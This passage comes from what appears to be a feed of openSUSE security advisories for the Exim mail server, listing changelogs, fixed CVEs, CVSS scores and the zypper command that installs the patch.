changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. 
Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. 
Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
(This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-677=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", 
"CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-07T00:00:00", "id": "OPENSUSE-SU-2021:0677-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4UGIR4NXSH3ADTQNJZHHL5EVSFNXRGTQ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 30 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n exim was updated to 4.94.2:\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset 
function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. 
Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n update to exim 4.94\n\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. 
Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the error message once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - don't create logfiles during install\n * fixes CVE-2020-8015 (boo#1154183)\n\n - add a spec-file workaround for boo#1160726\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no longer accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line recipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, when due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficiency of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector is set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attempted). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver now provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
(This seems to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, when built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interfaces can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currently use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
